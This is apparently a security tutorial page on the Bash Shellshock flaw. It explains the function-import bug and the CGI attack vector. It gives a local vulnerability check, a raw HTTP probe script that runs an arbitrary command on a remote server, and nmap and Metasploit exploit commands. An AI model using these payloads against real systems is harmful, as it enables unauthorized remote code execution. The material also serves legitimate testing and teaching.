Shellshock (CVE-2014-6271)

Description

Shellshock refers to a family of vulnerabilities in the Bash shell (present since Bash 1.03, released in 1989, through 4.3) that allow an attacker who controls the value of an environment variable passed to Bash to execute arbitrary commands. Wherever a network-facing service copies attacker-supplied input into environment variables before starting Bash, as CGI web scripts do, the flaw becomes remote code execution, often used to obtain a reverse shell on the target. The vulnerability was discovered by Stéphane Chazelas on September 12, 2014, and publicly disclosed on September 24, 2014.

Bash (Bourne Again Shell) is a Unix shell developed as part of the GNU project and is the default interactive shell on most Linux distributions.

The flaw lies in how Bash imports shell functions from the environment. Bash exports a function to child processes as an environment variable whose value begins with () {, and a newly started Bash parses every such variable to re-create the function. A vulnerable Bash does not stop at the closing brace: it keeps parsing and executes whatever follows it. An attacker therefore appends a command after a minimal function definition, () { :;};, and it runs as soon as Bash processes the variable.
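A local check for exactly this behaviour, added here as an example (it is not code from the original page): a variable holding an empty function definition plus a trailing command is exported and a child bash is started. The variable name x and the probe strings are arbitrary choices of this example.

```shell
#!/bin/sh
# Added example: local check for CVE-2014-6271.
# While importing the exported "function" x from the environment, a vulnerable
# bash keeps parsing after the closing brace and runs the trailing
# "echo vulnerable". A patched bash ignores the trailing text (current releases
# do not even treat a plain variable starting with "() {" as a function), so
# only the child's own "probe" output appears.
check_shellshock() {
    if ! command -v bash >/dev/null 2>&1; then
        echo "NO_BASH"        # nothing to test on this host
        return 0
    fi
    # The variable name x and the two echoed strings are arbitrary (assumed).
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "VULNERABLE"; return 1 ;;
        *)            echo "PATCHED";    return 0 ;;
    esac
}

# Run directly: prints VULNERABLE, PATCHED or NO_BASH and exits non-zero only
# when the trailing command was actually executed.
check_shellshock
```

The same idea is what every remote check does: get a string of that shape into any environment variable that a Bash process will see, then look for evidence that the trailing command ran.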

The vulnerability affects Unix-like systems on which Bash is installed, which includes most Linux distributions and macOS, whose bundled /bin/bash was affected and patched by Apple. Windows is not Unix-based and does not ship Bash, so it is only exposed through third-party Bash ports such as Cygwin.

Exploitation

Apache web servers that run CGI (Common Gateway Interface) scripts, in particular shell (.sh) scripts, are the classic vector. CGI is the mechanism by which Apache executes a program on the server and returns its output to the client, and mod_cgi hands the request to that program through environment variables: the User-Agent header becomes HTTP_USER_AGENT, Cookie becomes HTTP_COOKIE, Referer becomes HTTP_REFERER, the query string becomes QUERY_STRING, and so on. Any of these values is attacker-controlled.

To exploit Shellshock, an attacker needs an input vector that ends up in an environment variable read by Bash. On an Apache server, any legitimate CGI script reachable through the web server will do, provided it is a Bash script or calls Bash indirectly (for example through system() or popen() from a script written in another language). When the script is requested, the server spawns a new process with the request headers in its environment and Bash parses them on start-up, which is the moment the injected command runs.

The vulnerability can be exploited both manually and automatically using tools like the Metasploit Framework (MSF), which includes modules specifically designed for Shellshock exploitation.

Example

Manual exploitation

CGI script identification

Look for scripts under /cgi-bin/ (a directory brute-forcer or nmap's http-enum script will enumerate common names) and note which ones answer with 200; those are the candidates to test.

Payload

Set the User-Agent header to the payload and send the request with whichever HTTP client is convenient. mod_cgi exports the header as HTTP_USER_AGENT, so a vulnerable Bash runs the trailing command while importing the variable:

User-Agent: () { :;}; echo 'is vulnerable ?'

Note that the echoed text is not a valid CGI header, so Apache normally answers 500 (malformed header from script) rather than showing it; a change from the script's usual 200 to 500 is itself the tell. To get command output back in the body, have the payload emit a Content-Type header and a blank line first (echo Content-Type: text/plain; echo;) before the command.

Echo

echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo 'is vulnerable'\r\nHost: target\r\nConnection: close\r\n\r\n" | nc target 80

echo -e (a bash extension) builds the raw request and nc delivers it. Because the method is HEAD, only headers come back, so read the status line (200 becoming 500) rather than looking for the echoed text; the nmap script below shows the command output directly.
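The same probe as a small script, added here as an example and not taken from the page: it builds the request with a payload that yields a well-formed CGI response (Content-Type header, blank line, then a marker and the command output) and tests the reply for the marker, so a hit is unambiguous instead of being inferred from a 500. The target host, URI, port and the marker string are placeholder values assumed by this example.

```shell
#!/bin/sh
# Added example (not from the original page): Shellshock probe over raw HTTP.
# Target host, URI, port and the marker text are assumed placeholder values.

MARK='shellshock-probe-ok'   # printed by the payload; seen only if it ran

# Build the raw request. The injected function body is empty (":"); what
# matters is the text after "};". It first emits "Content-Type: text/plain"
# and a blank line so Apache's mod_cgi sees a valid CGI response (otherwise
# it answers 500 "malformed header from script" and the output is lost),
# then prints the marker and runs the chosen command.
build_request() {
    uri=$1; host=$2; cmd=$3
    payload="() { :;}; echo Content-Type: text/plain; echo; echo $MARK; $cmd"
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n' \
        "$uri" "$host" "$payload"
}

# Read an HTTP response on stdin; succeed only if the marker came back,
# i.e. the trailing command was executed by the target's bash.
is_vulnerable() {
    grep -q "$MARK"
}

# Send the probe with nc (5 s connect timeout) and print the raw response.
send_probe() {
    uri=$1; host=$2; port=$3; cmd=$4
    build_request "$uri" "$host" "$cmd" | nc -w 5 "$host" "$port"
}

# Usage: sh shellshock-probe.sh <host> <uri> [port] [cmd]
if [ "$#" -ge 2 ]; then
    host=$1; uri=$2; port=${3:-80}; cmd=${4:-id}
    if send_probe "$uri" "$host" "$port" "$cmd" | is_vulnerable; then
        echo "$host$uri: VULNERABLE (command executed)"
    else
        echo "$host$uri: marker not returned"
    fi
fi
```

Any other header that mod_cgi turns into an environment variable (Cookie, Referer) can carry the same payload; only the header name in build_request changes.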

Nmap

nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd=/usr/bin/whoami <target>

Burp Suite

Send a request for the CGI script to Repeater, replace the User-Agent value with the payload, resend it and compare the response with the original one.

Msfconsole

Metasploit also has a module for this vector, exploit/multi/http/apache_mod_cgi_bash_env_exec (exploit/multi/http/php_cgi_arg_injection targets a different bug, the PHP-CGI argument injection CVE-2012-1823, and will not trigger Shellshock). Set RHOSTS to the target and TARGETURI to the CGI script path, then run it; auxiliary/scanner/http/apache_mod_cgi_bash_env performs the same check without spawning a session.

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set TARGETURI /cgi-bin/status
